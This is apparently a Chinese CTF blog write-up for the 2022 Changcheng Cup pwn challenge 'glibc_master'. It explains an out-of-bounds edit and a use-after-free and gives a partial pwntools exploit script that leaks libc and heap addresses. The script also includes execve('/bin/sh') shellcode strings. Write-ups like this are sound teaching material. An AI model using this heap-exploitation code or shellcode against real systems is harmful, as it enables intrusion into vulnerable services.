---
title: 2022 长城杯 pwn Writeup
date: 2022-08-24 6:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=42/
pin: false
published:
---

## glibc_master(house of kiwi/UAF)

![image-20220825085120108](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220825085120108.png)

题目难点主要是edit功能会对堆内容进行一个加密，show功能有3次的次数限制，第三次会close（1）

![image-20220825085431830](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220825085431830.png)

漏洞点在edit功能的数组越界，同时dele功能还有个UAF

和这道题后续就基本一样了[2022nssrand4 pwn wp](https://blog.e4l4.com/posts/Nssctfrand4/#做道堆题休息一下吧高版本的小sizeoffbynull)劫持bss段上的stderr，house of kiwi或者house of cat都行

![image-20220825085506825](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220825085506825.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
import binascii
context.arch="amd64"
context.log_level = 'debug'

p = process("./glibc_master")
# p = remote("172.20.5.61","9999")
elf = ELF("./glibc_master")
libc = elf.libc

def dbg(con=''):
    gdb.attach(p,con)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------


def add(idx,size):
	sla(">>",1)
	sla('input index:',idx)
	sla("input size:",size)

def edit(idx,con):
	content = ''
	sla(">>",2)
	sla('input index:',idx)
	for i in range(len(con)):
	    content += chr(u8(con[i])^u8(string[i]))
	p.sendlineafter("input context:",content)

def show(idx):
	sla(">>",3)
	sla('input index:',idx)

def dele(idx):
	sla(">>",4)
	sla('input index:',idx)

string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='

add(0,0x440)
add(1,0x440)
dele(0)
add(2,0x450)
show(0)
libc_base = uu64()-0x2190c0
lg('libc_base')

edit(0,'a'*0x10)

show(0)
p.recvuntil('a'*0x10)

heap_base_x= p.recv(6)

content = ""
for i in range(6):
	content += chr(u8(heap_base_x[i])^u8(string[16+i]))

heap_base = u64(content.ljust(8,'\x00'))-0x290

lg('heap_base')

edit(0,p64(libc_base+0x2190c0)*2)

p.interactive()
```

